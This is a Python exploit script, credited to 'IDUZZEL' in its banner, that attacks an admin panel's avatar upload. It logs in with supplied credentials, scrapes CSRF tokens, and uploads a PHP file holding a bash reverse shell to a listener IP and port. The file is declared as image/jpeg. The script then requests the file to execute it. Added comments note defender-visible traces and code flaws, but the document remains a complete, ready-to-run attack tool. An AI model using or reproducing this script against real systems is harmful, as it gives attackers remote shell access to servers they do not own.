import argparse
import requests
from bs4 import BeautifulSoup
import subprocess
# ASCII-art banner printed once by main(). The \033[1;31m ... \033[0m pair are
# ANSI colour escapes (bold red / reset); when stdout is not a terminal they
# are emitted as raw escape bytes rather than colour.
BANNER = """
\033[1;31m _____ _____ ___ __ ___ ____ ___ _ _ ___ _ _ ___
/ __\ \ / / __|_|_ ) \_ )__ /__|_ ) | |_ ) | |/ _ \\
| (__ \ V /| _|___/ / () / / |_ \___/ /|_ _/ /|_ _\_, /
\___| \_/ |___| /___\__/___|___/ /___| |_/___| |_| /_/ EXPLOIT by IDUZZEL\033[0m
"""
def get_tokens(session, url, endpoint):
    """Fetch ``url/endpoint`` and pull the hidden ``_token`` input out of the page.

    Args:
        session: a ``requests.Session``; its cookie jar is what gets returned,
            so repeated calls on the same session accumulate cookies.
        url: base URL of the application, without a trailing slash.
        endpoint: path under ``url`` of the page carrying the form.

    Returns:
        ``(token, cookies)`` on success, where ``cookies`` is the session's
        cookie jar as a plain dict. ``(None, None)`` when the request fails
        (transport error or a 4xx/5xx status from ``raise_for_status``) or
        when the page has no ``<input name="_token">``. Failures are reported
        on stdout with a ``[-]`` prefix; nothing is raised to the caller.
    """
    page_url = f"{url}/{endpoint}"
    try:
        page = session.get(page_url)
        page.raise_for_status()
    except requests.RequestException as err:
        print(f"[-] Failed to fetch {endpoint} page: {err}")
        return None, None

    hidden = BeautifulSoup(page.text, 'html.parser').find('input', {'name': '_token'})
    if not hidden:
        print(f"[-] No _token input found on {endpoint} page")
        return None, None

    # An input without a value attribute raises KeyError here, as in the
    # original; only the "missing input" case is handled.
    return hidden['value'], session.cookies.get_dict()
def upload_revshell(url, username, password, ip, port):
    """Log in to the admin panel and push ``revshell.php`` through the avatar field.

    Sequence as written: fetch the login form's ``_token``/cookies, POST the
    credentials, fetch the settings form's ``_token``, multipart-POST a PHP
    file as the ``avatar`` part with a declared type of ``image/jpeg``, then
    request it at ``/uploads/images/revshell.php`` via ``curl``.

    For this to work the server must, by inference from the request shape
    (not verified here), accept an upload whose filename extension does not
    match its declared content type and store it in a web-reachable directory
    that executes PHP. From the defender's side the observable sequence is a
    settings POST carrying a ``.php`` filename declared as ``image/jpeg``
    immediately followed by a GET for a ``.php`` path under ``/uploads/images/``.

    Args:
        url: base URL of the target, no trailing slash.
        username, password: admin credentials used for the login POST.
        ip, port: listener address interpolated into the PHP payload.

    Returns:
        None. Every failure path prints a ``[-]`` message and returns early;
        no exception reaches the caller. Side effects on the local machine:
        ``revshell.php`` is written to the current working directory and is
        never removed.
    """
    session = requests.Session()
    token, cookies = get_tokens(session, url, 'admin/auth/login')
    if not token:
        print("[-] Unable to retrieve token for login")
        return
    login_data = {
        'username': username,
        'password': password,
        '_token': token
    }
    try:
        login_response = session.post(f"{url}/admin/auth/login", data=login_data, cookies=cookies)
        login_response.raise_for_status()
    except requests.RequestException as e:
        print(f"[-] Login failed: {e}")
        return
    # Only a non-error response whose body contains "Login failed" is treated
    # as a credential failure; any other body is assumed to be a logged-in page.
    if "Login failed" in login_response.text:
        print("[-] Login failed, check your credentials")
        return
    # The settings form carries its own CSRF token, hence the second fetch.
    token, cookies = get_tokens(session, url, 'admin/auth/setting')
    if not token:
        print("[-] Unable to retrieve token for settings")
        return
    # PHP reverse shell script
    revshell_content = f"<?php system('bash -c \"bash -i >& /dev/tcp/{ip}/{port} 0>&1\"'); ?>"
    # Written locally so it can be reopened below as a binary file part.
    with open('revshell.php', 'w') as revshell_file:
        revshell_file.write(revshell_content)
    files = {
        # Side effect on the target: the admin's display name is overwritten too.
        'name': (None, 'Administrator'),
        # NOTE(review): this handle is never closed (no `with`), so it leaks
        # until garbage collection. The declared type 'image/jpeg' does not
        # match the '.php' filename or the file's contents.
        'avatar': ('revshell.php', open('revshell.php', 'rb'), 'image/jpeg'),
        '_token': (None, token),
        # Form-field method override: presumably the framework treats this
        # POST as a PUT — confirm against the target's routing.
        '_method': (None, 'PUT')
    }
    try:
        response = session.post(f"{url}/admin/auth/setting", files=files, cookies=cookies)
        response.raise_for_status()
        # A non-error status only says the settings request was accepted; the
        # body is not inspected, so "uploaded successfully" is an assumption.
        print("[+] Reverse shell uploaded successfully! Attempting to execute it...")
        # Send GET request to execute the reverse shell in a non-blocking manner
        shell_url = f"{url}/uploads/images/revshell.php"
        # Popen returns immediately; curl's exit status and output are never
        # read, so the message below does not actually confirm execution.
        subprocess.Popen(['curl', shell_url])
        print(f"[+] Reverse shell executed successfully! Check your listener at {ip}:{port}")
    except requests.RequestException as e:
        print(f"[-] Failed to upload reverse shell: {e}")
def main():
    """Parse the command line, print the banner and call :func:`upload_revshell`.

    All five options are required; argparse exits with usage text if any is
    missing. The parser's description string says "command injection" while
    the work performed is a file upload followed by a GET — the text is kept
    verbatim here.
    """
    cli = argparse.ArgumentParser(description="Exploit script for command injection vulnerability")
    # (flags, help) pairs, in the original declaration order.
    option_table = (
        (('-u', '--url'), 'Target URL'),
        (('-U', '--username'), 'Username'),
        (('-P', '--password'), 'Password'),
        (('-i', '--ip'), 'IP for reverse shell'),
        (('-p', '--port'), 'Port for reverse shell'),
    )
    for flags, help_text in option_table:
        cli.add_argument(*flags, required=True, help=help_text)
    opts = cli.parse_args()

    print(BANNER)
    upload_revshell(opts.url, opts.username, opts.password, opts.ip, opts.port)
# Script entry point. argparse handles usage errors; any other exception
# raised inside main() propagates and terminates the process.
if __name__ == "__main__":
    main()